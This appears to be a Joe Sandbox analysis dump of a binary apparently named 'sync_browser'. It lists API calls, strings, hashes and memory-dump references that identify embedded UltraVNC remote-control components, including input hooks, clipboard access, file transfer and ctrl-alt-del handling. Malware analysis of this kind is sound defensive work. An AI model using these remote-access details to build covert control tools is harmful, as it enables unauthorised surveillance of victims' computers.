String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 341937111-959611688
Opcode ID: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
Instruction ID: d8797ed3516da8e6b0c3511a736060dee50d554a9cb8338999d8a2905b1180a1
Opcode Fuzzy Hash: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
Instruction Fuzzy Hash: 8FC20D66A78A5B91EF008B55E8544F4F364FB64788F805432F90E936ACEE7DE20ED740

Function 00007FF67E7F3E20 Relevance: 158.0, APIs: 55, Strings: 35, Instructions: 537libraryloaderthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7F3E6A
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7F3E94
GetThreadDesktop.USER32 ref: 00007FF67E7F3E9C
GetUserObjectInformationA.USER32 ref: 00007FF67E7F3EC7
SetThreadDesktop.USER32 ref: 00007FF67E7F3F0F
LoadLibraryA.KERNEL32 ref: 00007FF67E7F3F35
GetProcAddress.KERNEL32 ref: 00007FF67E7F3F45
GetStockObject.GDI32 ref: 00007FF67E7F3FD2
RegisterClassExA.USER32 ref: 00007FF67E7F3FEC
SetEvent.KERNEL32 ref: 00007FF67E7F401A
CreateWindowExA.USER32 ref: 00007FF67E7F4074
SetTimer.USER32 ref: 00007FF67E7F40A1
SetWindowLongPtrA.USER32 ref: 00007FF67E7F40B6
SetClipboardViewer.USER32 ref: 00007FF67E7F40CB
CreateThread.KERNEL32 ref: 00007FF67E7F4130
CloseHandle.KERNEL32 ref: 00007FF67E7F413E
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7F416C
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7F41D0
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7F4242
LoadLibraryA.KERNEL32 ref: 00007FF67E7F42D2
LoadLibraryA.KERNEL32 ref: 00007FF67E7F42E6
LoadLibraryA.KERNEL32 ref: 00007FF67E7F4302
GetProcAddress.KERNEL32 ref: 00007FF67E7F4342
GetProcAddress.KERNEL32 ref: 00007FF67E7F435D
GetProcAddress.KERNEL32 ref: 00007FF67E7F4378
GetProcAddress.KERNEL32 ref: 00007FF67E7F4393
GetProcAddress.KERNEL32 ref: 00007FF67E7F43B3
GetProcAddress.KERNEL32 ref: 00007FF67E7F43CE
GetProcAddress.KERNEL32 ref: 00007FF67E7F43E9
GetProcAddress.KERNEL32 ref: 00007FF67E7F4404
GetProcAddress.KERNEL32 ref: 00007FF67E7F4439
GetProcAddress.KERNEL32 ref: 00007FF67E7F4454
GetProcAddress.KERNEL32 ref: 00007FF67E7F446F
SetEvent.KERNEL32 ref: 00007FF67E7F4498
PeekMessageA.USER32 ref: 00007FF67E7F44D4
Sleep.KERNEL32 ref: 00007FF67E7F4675
CreateRectRgn.GDI32 ref: 00007FF67E7F469F
CombineRgn.GDI32 ref: 00007FF67E7F46BB
DeleteObject.GDI32 ref: 00007FF67E7F46C4
free.LIBCMT ref: 00007FF67E7F46CD
SetEvent.KERNEL32 ref: 00007FF67E7F46D9

Part of subcall function 00007FF67E7D7350: TryEnterCriticalSection.KERNEL32 ref: 00007FF67E7D7368
Part of subcall function 00007FF67E7D7350: LeaveCriticalSection.KERNEL32 ref: 00007FF67E7D749A

SetEvent.KERNEL32 ref: 00007FF67E7F472D
SetEvent.KERNEL32 ref: 00007FF67E7F4754
TranslateMessage.USER32 ref: 00007FF67E7F4780
DispatchMessageA.USER32 ref: 00007FF67E7F478A
WaitMessage.USER32 ref: 00007FF67E7F4795
DestroyWindow.USER32 ref: 00007FF67E7F47BC
DestroyWindow.USER32 ref: 00007FF67E7F47E0
SetEvent.KERNEL32 ref: 00007FF67E7F47ED
KillTimer.USER32 ref: 00007FF67E7F47FF
FreeLibrary.KERNEL32 ref: 00007FF67E7F4829
FreeLibrary.KERNEL32 ref: 00007FF67E7F483B
FreeLibrary.KERNEL32 ref: 00007FF67E7F484D
SetThreadDesktop.USER32 ref: 00007FF67E7F4857
CloseDesktop.USER32 ref: 00007FF67E7F4860

Strings

CaptureW8, xrefs: 00007FF67E7F4461
vncdesktopsink.cpp : failed to create hook window, xrefs: 00007FF67E7F4086
SetHook, xrefs: 00007FF67E7F43C0
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4, xrefs: 00007FF67E7F47A0
vncdesktopsink.cpp : RFB_MOUSE_UPDATE , xrefs: 00007FF67E7F46FA
vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch, xrefs: 00007FF67E7F447C
vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x, xrefs: 00007FF67E7F3EED
UnSetHook, xrefs: 00007FF67E7F43AC
vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop , xrefs: 00007FF67E7F3F19
ChangeWindowMessageFilter, xrefs: 00007FF67E7F3F3B
UnSetHooks, xrefs: 00007FF67E7F433B
SetHooks, xrefs: 00007FF67E7F4385
WinVNC desktop sink, xrefs: 00007FF67E7F3F92
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit, xrefs: 00007FF67E7F47C4
\w8hook64.dll, xrefs: 00007FF67E7F4277
vncdesktopsink.cpp : failed to register window class, xrefs: 00007FF67E7F3FFE
SetMouseFilterHook, xrefs: 00007FF67E7F434F, 00007FF67E7F43DB
StartW8, xrefs: 00007FF67E7F4432
vncdesktopsink.cpp : InitWindow called, xrefs: 00007FF67E7F3E4B
vnchook, xrefs: 00007FF67E7F431C
vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK, xrefs: 00007FF67E7F3E88
vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation , xrefs: 00007FF67E7F3ED1
WinVNC, xrefs: 00007FF67E7F4033
user32.dll, xrefs: 00007FF67E7F3F2E
vncdesktopsink.cpp : REct3 %i %i %i %i , xrefs: 00007FF67E7F4576
vncdesktopsink.cpp : RFB_SCREEN_UPDATE , xrefs: 00007FF67E7F455D
StopW8, xrefs: 00007FF67E7F4446
vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch, xrefs: 00007FF67E7F4866
\vnchooks.dll, xrefs: 00007FF67E7F419B
\schook64.dll, xrefs: 00007FF67E7F4205
vncdesktopsink.cpp : OOOOOOOOOOOO %i %i, xrefs: 00007FF67E7F44EA
vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's, xrefs: 00007FF67E7F4144
vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3, xrefs: 00007FF67E7F4767
SetKeyboardFilterHook, xrefs: 00007FF67E7F436A, 00007FF67E7F43F6
vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error , xrefs: 00007FF67E7F3E7C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
API String ID: 3632263120-2889214834
Opcode ID: d4ed9fe43cca48582b590be94b5749f1204be8c5f11941ab6a3d02875c788bcb
Instruction ID: ba414f46b00ae9ba423f8239be4c425ce85932e01459046ef8bbffa6d6c4aa26
Opcode Fuzzy Hash: d4ed9fe43cca48582b590be94b5749f1204be8c5f11941ab6a3d02875c788bcb
Instruction Fuzzy Hash: FE528E33A28B8695EB50CF64E8486A973A9FF68744F410536FA4D937A4EF3CE549C700

Function 00007FF67E7DA130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7DA176
OpenInputDesktop.USER32 ref: 00007FF67E7DA186
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7DA1B0
GetThreadDesktop.USER32 ref: 00007FF67E7DA1B8
GetUserObjectInformationA.USER32 ref: 00007FF67E7DA1E9
SetThreadDesktop.USER32 ref: 00007FF67E7DA231
OpenProcess.KERNEL32 ref: 00007FF67E7DA2B4
OpenProcessToken.ADVAPI32 ref: 00007FF67E7DA2D3
CloseHandle.KERNEL32 ref: 00007FF67E7DA2E0
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7DA2FA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF67E7DA3C9
GetLastError.KERNEL32 ref: 00007FF67E7DA3CF
CloseHandle.KERNEL32 ref: 00007FF67E7DA3E0
CloseHandle.KERNEL32 ref: 00007FF67E7DA3EF
OpenEventA.KERNEL32 ref: 00007FF67E7DA420
SetEvent.KERNEL32 ref: 00007FF67E7DA439
RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7DA46A
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7DA4A2
RegCloseKey.ADVAPI32 ref: 00007FF67E7DA4AD
OpenEventA.KERNEL32 ref: 00007FF67E7DA4D8
SetEvent.KERNEL32 ref: 00007FF67E7DA4F1
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7DA50B
GetDesktopWindow.USER32 ref: 00007FF67E7DA5A4
ShellExecuteA.SHELL32 ref: 00007FF67E7DA5CF
InitializeCriticalSection.KERNEL32 ref: 00007FF67E7DA627
Sleep.KERNEL32 ref: 00007FF67E7DA693
SetThreadDesktop.USER32 ref: 00007FF67E7DA6A1
CloseDesktop.USER32 ref: 00007FF67E7DA6AF

Strings

vistahook.cpp : OpenInputdesktop Error , xrefs: 00007FF67E7DA19B
open, xrefs: 00007FF67E7DA5C8
vistahook.cpp : !GetUserObjectInformation , xrefs: 00007FF67E7DA1F3
vistahook.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF67E7DA219
-softwarecadhelper, xrefs: 00007FF67E7DA335
Ctrl-alt-del require service, no permission, xrefs: 00007FF67E7DA5E3
Global\SessionEventUltraCad, xrefs: 00007FF67E7DA414, 00007FF67E7DA4CC
Warning, xrefs: 00007FF67E7DA27C
UAC is Disable, make registry changes to allow cad, xrefs: 00007FF67E7DA283
Winsta0\Default, xrefs: 00007FF67E7DA37A
Ctrl-alt-del require service, no permission, xrefs: 00007FF67E7DA656
UltraVNC Warning, xrefs: 00007FF67E7DA669
vistahook.cpp : OpenInputdesktop OK, xrefs: 00007FF67E7DA1A4
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00007FF67E7DA45C
cad.exe, xrefs: 00007FF67E7DA599
EnableLUA, xrefs: 00007FF67E7DA496
vistahook.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF67E7DA23B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1732492099-311746058
Opcode ID: 20d6492d90d5a74a6e5ba01d3dc958018533303475cbf5015b09960a1b1236a9
Instruction ID: ca6d804bffaa78476b60e3e9b247802d244c81012f69b57c13455151b14098ca
Opcode Fuzzy Hash: 20d6492d90d5a74a6e5ba01d3dc958018533303475cbf5015b09960a1b1236a9
Instruction Fuzzy Hash: 91F18C37A28B4285EB20CF65E8442A973A5FF64754F540236EA5EC7BA4DF3CE559C300

Function 00007FF67E7D4C10 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 357windowCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF67E7D4C41
SetWindowLongPtrA.USER32 ref: 00007FF67E7D4C89
EndDialog.USER32 ref: 00007FF67E7D4CA2
_snprintf.LIBCMT ref: 00007FF67E7D4CD0
_snprintf.LIBCMT ref: 00007FF67E7D4D0E
SetWindowTextA.USER32 ref: 00007FF67E7D4D1B
SetDlgItemTextA.USER32 ref: 00007FF67E7D4D3E
SendDlgItemMessageA.USER32 ref: 00007FF67E7D4D72
LoadStringA.USER32 ref: 00007FF67E7D4DCA
GetDlgItem.USER32 ref: 00007FF67E7D4E16
GetScrollInfo.USER32 ref: 00007FF67E7D4E29
SendDlgItemMessageA.USER32 ref: 00007FF67E7D4E67
SetForegroundWindow.USER32 ref: 00007FF67E7D4E70
GetDlgItem.USER32 ref: 00007FF67E7D4E7E
GetWindowLongPtrA.USER32 ref: 00007FF67E7D4E8C
GetDlgItem.USER32 ref: 00007FF67E7D4EA3
SetWindowLongPtrA.USER32 ref: 00007FF67E7D4EB4
GetDlgItem.USER32 ref: 00007FF67E7D4EED
GetWindowRect.USER32 ref: 00007FF67E7D4EFB
GetDlgItem.USER32 ref: 00007FF67E7D4F2E
MoveWindow.USER32 ref: 00007FF67E7D4F4F
GetDlgItem.USER32 ref: 00007FF67E7D4F5D
MoveWindow.USER32 ref: 00007FF67E7D4F83
GetDlgItem.USER32 ref: 00007FF67E7D4F91
MoveWindow.USER32 ref: 00007FF67E7D4FB4
GetDlgItem.USER32 ref: 00007FF67E7D4FC2
MoveWindow.USER32 ref: 00007FF67E7D4FE9
GetDlgItem.USER32 ref: 00007FF67E7D4FF7
MoveWindow.USER32 ref: 00007FF67E7D501E
GetDlgItem.USER32 ref: 00007FF67E7D502C
MoveWindow.USER32 ref: 00007FF67E7D5053
InvalidateRect.USER32 ref: 00007FF67E7D5061
EndDialog.USER32 ref: 00007FF67E7D5081
GetDlgItemTextA.USER32 ref: 00007FF67E7D50D7
ShowWindow.USER32 ref: 00007FF67E7D527C
SetForegroundWindow.USER32 ref: 00007FF67E7D5286

Strings

MS Sans Serif, xrefs: 00007FF67E7D4D47
Chat with <%s> - UltraVNC, xrefs: 00007FF67E7D4CFD

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
String ID: Chat with <%s> - UltraVNC$MS Sans Serif
API String ID: 3122538718-446500584
Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction ID: f460e8b8138011fcfb5fe7e65ca52a673d81de9ad6fc47a67845fb7a93cb79a4
Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
Instruction Fuzzy Hash: 22F1A076B2864286EB64DB6AE40437977A1FB98B94F544131EE0E87BA4DF3CE44DC700

Function 00007FF67E7D20E0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241sleeplibrarysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7D1640: GetVersionExA.KERNEL32 ref: 00007FF67E7D1671
Part of subcall function 00007FF67E7D1640: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D16B3
Part of subcall function 00007FF67E7D1640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1767
Part of subcall function 00007FF67E7D1640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1790
Part of subcall function 00007FF67E7D1640: GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7D17CE

OpenEventA.KERNEL32 ref: 00007FF67E7D2137
SetEvent.KERNEL32 ref: 00007FF67E7D2153
CloseHandle.KERNEL32 ref: 00007FF67E7D2160
Sleep.KERNEL32 ref: 00007FF67E7D216B
OpenEventA.KERNEL32 ref: 00007FF67E7D217F
CreateEventA.KERNEL32 ref: 00007FF67E7D219F
CreateEventA.KERNEL32 ref: 00007FF67E7D21BA
Sleep.KERNEL32 ref: 00007FF67E7D21CC
WaitForMultipleObjects.KERNEL32 ref: 00007FF67E7D2211
SetEvent.KERNEL32 ref: 00007FF67E7D2255
Sleep.KERNEL32 ref: 00007FF67E7D2276
Sleep.KERNEL32 ref: 00007FF67E7D2289
GetExitCodeProcess.KERNEL32 ref: 00007FF67E7D22A5
Sleep.KERNEL32 ref: 00007FF67E7D22BE
Sleep.KERNEL32 ref: 00007FF67E7D22CD
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D22DF
CloseHandle.KERNEL32 ref: 00007FF67E7D22EC
Sleep.KERNEL32 ref: 00007FF67E7D230A
Sleep.KERNEL32 ref: 00007FF67E7D2319
CloseHandle.KERNEL32 ref: 00007FF67E7D232B
CloseHandle.KERNEL32 ref: 00007FF67E7D233D
LoadLibraryA.KERNEL32 ref: 00007FF67E7D235B
GetProcAddress.KERNEL32 ref: 00007FF67E7D236E
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D2392
GetDesktopWindow.USER32 ref: 00007FF67E7D241F
ShellExecuteA.SHELL32 ref: 00007FF67E7D2448
FreeLibrary.KERNEL32 ref: 00007FF67E7D245A
SetEvent.KERNEL32 ref: 00007FF67E7D2471
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D2492
CloseHandle.KERNEL32 ref: 00007FF67E7D24A4
CloseHandle.KERNEL32 ref: 00007FF67E7D24B6
CloseHandle.KERNEL32 ref: 00007FF67E7D24C8
CloseHandle.KERNEL32 ref: 00007FF67E7D24DA

Strings

open, xrefs: 00007FF67E7D2431
Global\SessionEventUltra, xrefs: 00007FF67E7D2116, 00007FF67E7D2171, 00007FF67E7D2191
SendSAS, xrefs: 00007FF67E7D2361
Global\SessionEventUltraCad, xrefs: 00007FF67E7D21A5
cad.exe, xrefs: 00007FF67E7D2414
sas.dll, xrefs: 00007FF67E7D2354

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
API String ID: 767217470-2348971971
Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
Instruction ID: 06cde7bcb3ee169eb7ec5758f237358214d74f5e8419bf362eeca49ada5fb3e1
Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
Instruction Fuzzy Hash: B8C18F2BE29B8281FA65DF65E854279A3A4FFA5B50F540135F95E836A4CF3CE44EC300

Function 00007FF67E7DA890 Relevance: 61.5, APIs: 28, Strings: 7, Instructions: 227threadwindowtimeCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF67E7DA8C7
EndDialog.USER32 ref: 00007FF67E7DA90F
GetForegroundWindow.USER32 ref: 00007FF67E7DA91E
GetWindowThreadProcessId.USER32 ref: 00007FF67E7DA929
GetCurrentProcessId.KERNEL32 ref: 00007FF67E7DA931
FlashWindow.USER32 ref: 00007FF67E7DA950
sprintf.LIBCMT ref: 00007FF67E7DA97C
SetDlgItemTextA.USER32 ref: 00007FF67E7DA991
SetWindowLongPtrA.USER32 ref: 00007FF67E7DA9DA
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7DAA19
SetDlgItemTextA.USER32 ref: 00007FF67E7DAA74
SetDlgItemTextA.USER32 ref: 00007FF67E7DAA86
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7DAA9C
LoadImageA.USER32 ref: 00007FF67E7DAB27
GetDlgItem.USER32 ref: 00007FF67E7DAB3C
SendMessageA.USER32 ref: 00007FF67E7DAB54
SetTimer.USER32 ref: 00007FF67E7DAB6A
EndDialog.USER32 ref: 00007FF67E7DAB88
sprintf.LIBCMT ref: 00007FF67E7DABB2
SetDlgItemTextA.USER32 ref: 00007FF67E7DABC7
GetForegroundWindow.USER32 ref: 00007FF67E7DABF1
GetWindowThreadProcessId.USER32 ref: 00007FF67E7DABFC
GetCurrentProcessId.KERNEL32 ref: 00007FF67E7DAC04
SetActiveWindow.USER32 ref: 00007FF67E7DAC11
SetForegroundWindow.USER32 ref: 00007FF67E7DAC28
MessageBeep.USER32 ref: 00007FF67E7DAC33
DeleteObject.GDI32 ref: 00007FF67E7DAC42
EndDialog.USER32 ref: 00007FF67E7DAC50

Strings

AutoAccept: %u, xrefs: 00007FF67E7DA96C
accept_reject_mesg, xrefs: 00007FF67E7DAA0A
AutoReject:%u, xrefs: 00007FF67E7DABAB
\mylogo.bmp, xrefs: 00007FF67E7DAAF6
admin, xrefs: 00007FF67E7DAA03
AutoReject: %u, xrefs: 00007FF67E7DA975
AutoAccept:%u, xrefs: 00007FF67E7DAB9A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

